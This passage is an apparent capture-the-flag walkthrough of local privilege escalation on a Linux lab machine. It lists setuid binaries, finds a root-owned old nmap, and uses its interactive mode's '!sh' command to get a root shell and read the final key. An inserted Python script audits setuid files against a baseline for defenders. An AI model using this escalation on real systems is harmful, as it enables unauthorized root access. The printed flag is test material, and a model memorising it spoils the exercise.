Next, let's see which program files on the target system have the SUID (Set owner User ID upon execution) bit set:
$ find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Or, equivalently, with this command:
$ find / -perm -4000 -type f 2>/dev/null
Here we run into an old friend, nmap, more precisely an old version (3.81). The interesting part is that the executable is owned by root:
$ ls -l /usr/local/bin/nmap
-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap
This means we can start an nmap process as the current user, and that process will in theory run with root privileges.
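A defender-side complement to the enumeration above, added here as an example and not code from the original writeup: a small Python audit that takes the output of `find / -perm -4000 -type f`, reports every setuid path that is not in a baseline of expected setuid programs, and checks an `ls -l` line for the root-owned setuid combination that makes a binary like this nmap worth a second look. The baseline below is constructed for the example from the stock binaries in the listing above (minus nmap); on a real host it should come from a golden image or the distribution's package manifests, which this example does not consult.

```python
"""Audit a list of setuid files against a baseline of expected setuid programs.

Added example for this writeup, not code from the original page. The baseline
is constructed for illustration; on a real host it should come from a golden
image or package manifests.
"""
import os
import re
import stat
from typing import Iterable, List

# Constructed sample: the `find / -perm -4000 -type f 2>/dev/null` output quoted
# in the writeup, one path per line.
SAMPLE_FIND_OUTPUT = """
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
"""

# Assumed baseline (hypothetical): the stock setuid binaries from the same
# listing. Anything outside this set is reported for review.
EXPECTED_SUID = frozenset({
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
    "/usr/lib/pt_chown",
})


def parse_find_output(text: str) -> List[str]:
    """Turn raw `find` output into a sorted, de-duplicated list of paths."""
    return sorted({line.strip() for line in text.splitlines() if line.strip()})


def unexpected_suid(paths: Iterable[str], baseline=EXPECTED_SUID) -> List[str]:
    """Return the setuid paths that are not in the baseline, sorted."""
    return sorted(p for p in paths if p not in baseline)


# One `ls -l` line, e.g.
# "-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap"
LS_LONG_RE = re.compile(
    r"^(?P<mode>[-bcdlps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+(?P<date>.+?)\s+(?P<path>/\S+)$"
)


def is_root_setuid(ls_line: str) -> bool:
    """True when an `ls -l` line describes a root-owned regular file whose
    owner-execute position carries the setuid flag ('s' or 'S')."""
    m = LS_LONG_RE.match(ls_line.strip())
    if not m:
        raise ValueError(f"not an ls -l line: {ls_line!r}")
    mode = m.group("mode")
    return mode[0] == "-" and mode[3] in "sS" and m.group("owner") == "root"


def live_setuid_files(root: str = "/") -> List[str]:
    """Python equivalent of `find ROOT -perm -4000 -type f` for a live audit;
    unreadable directories and vanished files are skipped silently."""
    found = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


if __name__ == "__main__":
    for path in unexpected_suid(parse_find_output(SAMPLE_FIND_OUTPUT)):
        print("review:", path)
    print(is_root_setuid(
        "-rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap"))
```

Run against the sample listing it reports only `/usr/local/bin/nmap`; on a live host, feed `live_setuid_files()` into `unexpected_suid()` with a baseline taken from a clean reference system, and treat anything reported as a candidate for `chmod u-s` or removal.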
Looking at the output of `nmap --help`, we learn that nmap has an interactive mode, entered with the `--interactive` option:
robot@linux:~$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
Interactive mode is a kind of REPL environment; let's look at its built-in help:
nmap> h
h
Nmap Interactive Commands:
n <nmap args> -- executes an nmap scan using the arguments given and
waits for nmap to finish. Results are printed to the
screen (of course you can still use file output commands).
! <command> -- runs shell command given in the foreground
x -- Exit Nmap
f [--spoof <fakeargs>] [--nmap_path <path>] <nmap args>
-- Executes nmap in the background (results are NOT
printed to the screen). You should generally specify a
file for results (with -oX, -oG, or -oN). If you specify
fakeargs with --spoof, Nmap will try to make those
appear in ps listings. If you wish to execute a special
version of Nmap, specify --nmap_path.
n -h -- Obtain help with Nmap syntax
h -- Prints this help screen.
Examples:
n -sS -O -v example.com/24
f --spoof "/usr/local/bin/pico -z hello.c" -sS -oN e.log example.com/24
Very good: nmap can run shell commands, and it does so as root. This is the privilege escalation exploit:
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
No need to be polite, then: open a shell directly as root and see what is in root's home directory:
nmap> !sh
# cd /root
# ls
firstboot_done key-3-of-3.txt
The last key is in hand:
# cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4